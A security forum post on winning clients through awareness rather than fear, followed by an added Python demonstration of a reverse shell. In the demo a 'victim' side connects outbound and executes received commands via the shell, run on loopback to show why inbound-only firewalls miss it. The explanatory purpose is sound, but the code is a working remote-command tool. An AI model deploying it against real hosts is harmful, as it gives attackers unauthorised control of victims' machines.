H1t M0nk3y wrote: As long as you can scare your clients, you know/hope they will fix their things.
It's never about "scaring" clients, believe it or not. Raising awareness with them goes a hell of a lot further. Most clients nowadays are aware of the risks but won't fully understand the extent of them.
Today I had to sit through a presentation with the owner of my company and a "Tony Robbins"-like sales coach (for lack of a better description) and explain to him in not-so-technical terms what it is I (we as a company) can do. I briefly explained to him how extrusion and intrusion detection systems fail, as do firewalls. I had to tone it down to make the risks understood.
After explaining it to him, he sort of got it but was shocked at the speed at which I could get into machines/networks. Now, this doesn't make me an "uberhacker"; on the contrary, I could say it makes some clients uber-lacking in common sense. Take a look at the vast majority of what people are calling "insider threats." Does someone clicking on a loaded link (backdoored PDF, DOC, HTML link, etc.) constitute an insider attack? You bet it does. Remember, a reverse shell is someone connecting TO THE attacker. Kiss your firewall goodbye (when done properly).
Awareness goes a long way. Clients don't want to be scared, and it's not where you want them to be. Scared people don't think straight. Besides, they've already heard this routine time and time again: "Buy this firewall, guaranteed to stop...", "Oh, you need this shiny, sparkly, blinky-light IPS", "What you really need is DLP", and the list goes on. What people REALLY need is awareness. Expressing this to a client is guaranteed to always keep you in their mind.
Think about that for a bit... If it were you and you were speaking to, say, a family member, friend, colleague, golfing buddy, etc., would you remember someone who scared you or someone who made you think in a more positive light?
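The reverse-shell point in the post above ("someone connecting TO THE attacker") is easiest to see with the two halves side by side. The following is an added loopback demonstration, not code from the original post or its author: the "attacker" side only ever listens and accepts, while the "victim" side (the user who opened the backdoored document) opens the TCP session outbound and runs whatever it is sent. The host, the length-prefixed framing, the `inbound_only_firewall_stops` policy model and the constructed `echo` commands are all assumptions made here for the example; everything runs on 127.0.0.1 with harmless commands.

```python
"""Loopback reverse shell: the victim connects out, the attacker only listens.

Added example (not from the original post). Because the only new TCP session
is initiated from inside the perimeter, a firewall that denies unsolicited
inbound connections but allows outbound ones never sees anything to block.
"""
import socket
import struct
import subprocess
import threading

# Constructed values for this demonstration.
LISTEN_HOST = "127.0.0.1"        # a real listener would sit outside the perimeter
DEMO_COMMANDS = ["echo reverse-shell-ok", "echo $((6*7))"]


def send_frame(sock, payload: bytes) -> None:
    """Length-prefixed framing so multi-line command output survives intact."""
    sock.sendall(struct.pack(">I", len(payload)) + payload)


def recv_exact(sock, n: int):
    """Read exactly n bytes, or None if the peer closed the connection."""
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            return None
        buf += chunk
    return buf


def recv_frame(sock):
    header = recv_exact(sock, 4)
    if header is None:
        return None
    (length,) = struct.unpack(">I", header)
    return recv_exact(sock, length)


def attacker_side(listener, commands, results):
    """Attacker: never connects anywhere; accepts the session the victim opens,
    pushes commands down it and collects the output."""
    conn, _peer = listener.accept()
    with conn:
        for cmd in commands:
            send_frame(conn, cmd.encode())
            out = recv_frame(conn)
            results.append(out.decode().strip() if out is not None else None)
        send_frame(conn, b"exit")


def victim_side(host, port):
    """Victim: the outbound connection is the whole trick. Once connected it
    executes each received command and ships the output back."""
    with socket.create_connection((host, port)) as s:
        while True:
            cmd = recv_frame(s)
            if cmd is None or cmd == b"exit":
                return
            proc = subprocess.run(cmd.decode(), shell=True, capture_output=True)
            send_frame(s, proc.stdout + proc.stderr)


def run_demo(commands=DEMO_COMMANDS):
    """Run both halves on loopback and return the command output the attacker saw."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.settimeout(5)
    listener.bind((LISTEN_HOST, 0))   # port 0: let the OS pick a free port
    listener.listen(1)
    port = listener.getsockname()[1]
    results = []
    t = threading.Thread(target=attacker_side, args=(listener, commands, results))
    t.start()
    victim_side(LISTEN_HOST, port)    # the victim initiates; the attacker waits
    t.join(timeout=5)
    listener.close()
    return results


def inbound_only_firewall_stops(session_initiator: str) -> bool:
    """Toy model of the common 'deny new inbound, allow outbound' policy.
    A bind shell is started from 'outside' and is stopped; a reverse shell is
    started from 'inside' and sails through."""
    return session_initiator == "outside"


if __name__ == "__main__":
    print(run_demo())                              # ['reverse-shell-ok', '42']
    print(inbound_only_firewall_stops("outside"))  # bind shell: True (blocked)
    print(inbound_only_firewall_stops("inside"))   # reverse shell: False (allowed)
```

The thing to notice is which side calls `connect`: only `victim_side` does. Swap the loopback address for an Internet host and the picture is exactly the one the post describes, an outbound session that default-deny-inbound rules were never written to catch, which is why egress filtering and user awareness matter more than the shiny inbound appliance.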